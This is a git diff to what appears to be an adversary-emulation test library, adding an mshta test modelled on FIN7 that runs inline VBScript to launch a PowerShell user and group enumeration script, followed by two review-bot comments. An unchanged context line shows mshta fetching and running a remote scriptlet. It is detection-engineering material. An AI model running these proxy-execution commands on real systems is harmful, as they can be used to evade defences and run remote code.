diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index e88984fb..2b5dbc34 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -18,4 +18,20 @@ atomic_tests:
     elevation_required: false
     command: |
       mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
-
+
+- name: Mshta executes VBScript to execute malicious code
+  description: |
+    Run a local VB script to run local user enumeration powershell command
+
+    This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+  supported_platforms:
+  - windows
+  input_arguments:
+    atomics_path:
+      description: path to atomics folder
+      type: path
+      default: ..\..\atomics
+  executor:
+    name: command_prompt
+    command: |
+      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file #{atomics_path}\T1170\src\powershell.ps1"":close")
diff --git a/atomics/T1170/src/powershell.ps1 b/atomics/T1170/src/powershell.ps1
new file mode 100644
index 00000000..701fb709
--- /dev/null
+++ b/atomics/T1170/src/powershell.ps1
@@ -0,0 +1,2 @@
+Get-LocalUser
+Get-LocalGroup
\ No newline at end of file
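Review bot: The `default: ..\..\atomics` value for `atomics_path` is a relative path, so `#{atomics_path}\T1170\src\powershell.ps1` resolves against whatever working directory the harness launches `mshta` from rather than against the location of this YAML; unless the harness guarantees that cwd, the test will fail with a file-not-found from powershell.exe, and the `description` should at least state the expected cwd. The command also runs powershell with `-noexit`, which leaves a console window and process behind after the test, and the test has no cleanup step to terminate it; consider either dropping `-noexit` or documenting the lingering process so detection engineers reproducing the test know what to expect. Finally, the description says "Run a local VB script", but the VBScript here is passed inline on the `mshta` command line and only the PowerShell part is a file; rewording it to `Run inline VBScript via mshta that launches a local PowerShell script performing local user and group enumeration` would match the executor.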
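Review bot: The new script has no header explaining what it is for or what it needs, and `Get-LocalUser` / `Get-LocalGroup` come from the Microsoft.PowerShell.LocalAccounts module that ships with Windows PowerShell 5.1, so on older hosts both lines error out and the atomic produces no activity to detect. A two-line comment such as `# Local user/group enumeration payload for T1170 (launched via mshta -> Wscript.Shell -> powershell)` and `# Requires Windows PowerShell 5.1+ (Microsoft.PowerShell.LocalAccounts)` would let a reader place the file without opening the YAML. The file also ends without a trailing newline.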